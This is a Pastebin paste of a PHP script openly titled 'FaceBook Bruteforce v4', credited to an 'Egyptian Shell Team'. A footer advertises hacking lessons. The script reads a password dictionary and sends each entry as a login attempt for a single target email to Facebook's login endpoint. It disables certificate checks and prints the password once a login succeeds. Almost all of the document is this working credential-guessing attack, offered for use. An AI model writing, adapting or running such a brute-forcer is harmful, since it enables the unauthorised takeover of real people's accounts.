Advertisement
Dr_FarFar

[+] FaceBook Bruteforce v4 | Powered By Dr.FarFar |

Mar 13th, 2014
541
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.93 KB | None | 0 0
  1. /*
  2.  
  3.  ______                  _   _                _____ _          _ _   _______                  
  4. |  ____|                | | (_)              / ____| |        | | | |__   __|                  
  5. | |__   __ _ _   _ _ __ | |_ _  __ _ _ __   | (___ | |__   ___| | |    | | ___  __ _ _ __ ___  
  6. |  __| / _` | | | | '_ \| __| |/ _` | '_ \   \___ \| '_ \ / _ \ | |    | |/ _ \/ _` | '_ ` _ \
  7. | |___| (_| | |_| | |_) | |_| | (_| | | | |  ____) | | | |  __/ | |    | |  __/ (_| | | | | | |
  8. |______\__, |\__, | .__/ \__|_|\__,_|_| |_| |_____/|_| |_|\___|_|_|    |_|\___|\__,_|_| |_| |_|
  9.         __/ | __/ | |                                                                          
  10.        |___/ |___/|_|                            
  11.                                              
  12. ~~~ :xD: Have fun. Don't forget To Bookmark This Website :xD:
  13. ~~~ http://www.egyptianshell.com/
  14. ~~~ Dr.FarFar & Mr.MaGMA & Th3 Mast3r
  15.  
  16. */
  17.  
  18. ###################################################################################################
  19.  
  20. set_time_limit(0);
  21. $username ="Mail@Mail.tld"; // username to brute force
  22. $dictionary ="Dictionary.txt"; // need dictionary to password list
  23.  
  24. function control($username,$password){
  25. $useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
  26. $data = "email=$username&pass=$password&login=Login" ;
  27. $ch = curl_init('https://login.facebook.com/login.php?m&next=http%3A%2F%2Fm.facebook.com%2Fhome.php');
  28. curl_setopt($ch, CURLOPT_HEADER, 0);
  29. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  31. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  32. curl_setopt($ch, CURLOPT_POST, 1);
  33. curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  34. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  35. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  36. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  37. $source=curl_exec ($ch);
  38. curl_close ($ch);
  39. if(eregi("Home</title>",$source)){return true;} else {return false;}
  40.  
  41. }
  42.  
  43. if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
  44. $lines=file($dictionary);
  45. echo "Attack Starting..<br>";
  46. sleep(10);
  47. echo "Attack Started, Brute Forcing..<br>";
  48. foreach($lines as $line){
  49. $line=str_replace("\r","",$line);
  50. $line=str_replace("\n","",$line);
  51. if(control($username,$line)){echo "<font face=Tahoma color=green>***91;+***93;</font><font face=tahoma> username:$username , password:$line - P
  52. assword found : $line</font><br>";$fp=fopen('Cookie.txt','w');fwrite($fp,'');exit;}
  53. else{echo "<font face=tahoma color=brown>***91;-***93;</font><font face=tahoma> username:$username , password:$line - Password Not Found :
  54. $line</font><br>";}
  55. }
  56. ?>
  57.  
  58. ###################################################################################################
  59.  
  60.               لمزيد من المعلومات او لمزيد من دروس القرصنه      
  61.        
  62.                     تابعونا علي
  63.  
  64.                 https://www.facebook.com/egyshell
  65.                 http://WwW.EgyptianShell.com/
  66.  
  67.                      ~\ Dr.FarFar & Mr.MaGMA & Th3 Mast3r /~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement